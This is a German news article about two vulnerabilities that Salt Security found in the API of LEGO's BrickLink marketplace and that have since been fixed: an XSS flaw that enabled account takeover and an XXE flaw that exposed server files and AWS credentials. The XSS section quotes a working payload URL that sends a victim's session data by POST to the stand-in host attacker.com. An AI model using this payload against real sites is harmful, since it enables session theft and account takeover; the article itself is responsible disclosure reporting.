Ein ziemlich verärgertes LEGO-Männchen
Ein ziemlich verärgertes LEGO-Männchen
Bildquelle: AndrewLozovyi, Lizenz

LEGO: BrickLink-Konten ließen sich mit einem Klick übernehmen

Die Handelsplattform BrickLink beheimatet Daten von mehr als einer Million treuer LEGO-Fans. Ein gefundenes Fressen für Cyberkriminelle.

Der unter dem Namen BrickLink geführte Marktplatz von LEGO zählt über eine Million registrierte Benutzer und verfügt damit über einen großen Pool an Nutzerdaten, die für Cyberkriminelle durchaus interessant sein könnten. Wie einfach der Zugriff darauf sein kann, demonstrierten Sicherheitsexperten von Salt Security.

Daten von mehr als einer Million Benutzer waren in Gefahr

Sicherheitsforscher von Salt Security haben zwei Schwachstellen in der API von LEGOs BrickLink-Plattform aufgedeckt. Dadurch war es Angreifern mitunter möglich, Benutzerkonten vollständig zu übernehmen, auf personenbezogene Daten sowie interne Produktionsdaten zuzugreifen und die Serversysteme der Handelsplattform zu kompromittieren.

Bei BrickLink handelt es sich um den offiziellen Marktplatz der LEGO-Gruppe. Zugleich ist dort die weltweit größte Online-Community für LEGO-Fans mit mehr als einer Million registrierten Benutzern beheimatet.

Die Aufdeckung der Sicherheitslücken gelang den Forschern durch einfaches Experimentieren mit Eingabefeldern auf der BrickLink-Webseite. Sie stellten beispielsweise fest, dass sich durch einen speziell gestalteten Link, eingefügt in das Feld “Find Username” des Coupon-Suchbereichs, bösartiger Code auf dem Rechner eines Benutzers der Plattform einschleusen und ausführen lässt.

Kontoübernahme von LEGO-Liebhabern durch nur einen Klick

So konnten die Forscher die Sitzung einer Zielperson durch sogenanntes Cross-Site-Scripting (XSS) übernehmen und sich damit Zugang zum jeweiligen Benutzerkonto verschaffen. Alles, was sie laut BleepingComputer dafür benötigten, war die Sitzungs-ID des auf BrickLink angemeldeten Opfers.

Um diese zu erhalten, erstellten die Forscher einen speziellen Link:

https://bricklink.com/orderCoupons.asp?v=W&viewUsername=xss"onfocus="fetch('https://www.bricklink.com/v3/member/community_experts.page').then(response=>response.text()).then(data=>fetch('https://attacker.com',{method:'POST',mode: 'no-cors',body:data}));"+autofocus="

Sobald ein Benutzer diesen anklickt, liest der darin eingebettete Code automatisch die Session-ID aus der Abfrage eines API-Endpunktes der LEGO-Plattform und übermittelt sie an einen fiktiven und von Angreifern kontrollierten Server.

Daraufhin konnten Cyberkriminelle Zugriff auf sämtliche in dem BrickLink-Benutzerkonto verfügbare Daten erlangen. Darunter auch Wunschlisten, Nachrichtenverläufe, Gutscheine, getätigte Bestellungen, Lieferadressen und E-Mail-Adressen.

Selbst die AWS-Zugangsdaten waren bei LEGO nicht sicher

Die zweite Schwachstelle bezog sich auf BrickLinks Funktion “Upload to Wanted List“. Darüber können Anwender ganze XML-Listen mit LEGO-Teilen hochladen, die sie auf der Plattform suchen möchten.

Hier gelang es den Forschern, den XML-Parser durch spezielle Befehle dazu zu bringen, ganze Systemdateien vom Webserver offenzulegen. Dies verdeutlichten sie in ihrem Bericht eindrucksvoll, indem sie den Server dazu veranlassten, den vollständigen Inhalt der “/etc/passwd” auszugeben. Letztendlich konnten die Sicherheitsforscher dem System sogar seine AWS-EC2-Zugangsdaten entlocken.

Nachdem Salt Security die Erkenntnisse an LEGO gemeldet hatte, ergriff das Unternehmen entsprechende Maßnahmen und schloss die genannten Sicherheitslücken auf BrickLink.

Tarnkappe.info

Mehr zu dem Thema
Marc Stöckel hat nach seiner Ausbildung zum IT-Systemelektroniker und einem Studium im Bereich der technischen Informatik rund 5 Jahre als Softwareentwickler gearbeitet. Um seine technische Expertise sowie seine Sprachfertigkeiten weiter auszubauen, schreibt er seit dem Sommer 2022 regelmäßig Artikel zu den Themenbereichen Software, IT-Sicherheit, Datenschutz, Cyberkriminalität und Kryptowährungen.